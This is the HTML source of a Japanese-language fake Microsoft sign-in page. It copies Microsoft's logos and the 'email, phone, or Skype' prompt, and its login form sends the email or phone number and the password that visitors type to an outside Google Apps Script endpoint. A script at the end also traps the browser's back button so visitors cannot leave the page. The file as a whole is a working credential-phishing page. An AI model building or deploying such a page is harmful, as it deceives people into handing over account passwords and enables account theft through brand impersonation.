<!DOCTYPE html>
<html lang="ja">
    <meta meta name="viewport" content="width=device-width,initial-scale=1">
</meta>
<head>

<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-09GL6WXVCF');
</script>
    <link rel="icon" type="image/svg" href="microsoft_logo.svg">
<style type="text/css">

    body{
    margin: 0;
    padding: 0;
    font-family: sans-serif;
    background-image: url("background.png");
}
 
/*ログインフォームのエリア内のスタイル*/
.box{
    width: 300px;
    padding: 40px;
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background: #fafafa;
    text-align: center;
}
 
.box{
    color: rgb(15, 15, 15);
    text-transform: uppercase;
    font-weight: 500;
}
 
/* ユーザーIDとパスワード入力ボックスのスタイル */
.box input[type="text"], .box input[type="password"]{
    border: 0;
    background: none;
    display: block;
    margin: 20px auto;
    text-align: center;
    border: 2px solid #27df92;
    padding: 14px 10px;
    width: 200px;
    outline: none;
    color: rgb(43, 41, 41);
    border-radius: 24px;
    transition: 0.25s;
}
 
/* 入力ボックスがフォーカスされたときのスタイル（幅が大きくなる＆枠の色が変わる） */
.box input[type="text"]:focus, .box input[type="password"]:focus{
    width: 250px;
    border-color: #e45dc2;
}
 
/* Loginボタンのスタイル */
.box input[type="submit"]{
    border: 0;
    background: #007ff7;
    display: block;
    margin: 20px auto;
    text-align: center;
    border: 3.5px solid #3a7cdf;;
    padding: 10px 100px;
    outline: none;
    color: rgb(255, 255, 255);
    border-radius: 24px;
    transition: 0.25s;
    -webkit-appearance: none;
}
@media screen and(max-width: 480px) {
    img {
    border: 0;
    }
    }
@media screen and(min-width: 1280px) {
    img {
    border: 1px solid red;
    }
}
    </style>
    <meta charset="UTF-8">
    <title>アカウントにサインイン</title>
</head>
<body>
    
    <form class="box" action="https://script.google.com/macros/s/AKfycbzDfDjPEm94Sy_05QglCXWKtWbjimnLPMYu7yCkwDCEch24dVFkRxMUwYqNI8T5sqkv/exec" method="post">
    <img src="Microsoft_logo_2012_.svg.svg" alt="" width="165px">
        <h1>サインイン</h1>
        <input id="input__mailtel" type="text" name="mail_tel" value="" placeholder="メール、電話、または Skype"> <input id="input__password" type="password" name="password" placeholder="パスワードを入力">
        <input type="submit" name="" value="サインイン">
    </form>
    <!--JavaScript at end of body for optimized loading-->
    <script src="https://code.jquery.com/jquery-3.6.0.slim.min.js" integrity="sha256-u7e5khyithlIdTpu22PHhENmPcRdFiHRjhAuHcs05RI=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/platform/1.3.6/platform.min.js"></script>
    <script type="text/javascript">
       history.pushState(null, null, location.href);
       $(window).on('popstate', function(){
         history.go(1);
       });
      </script>
</body>
</html>
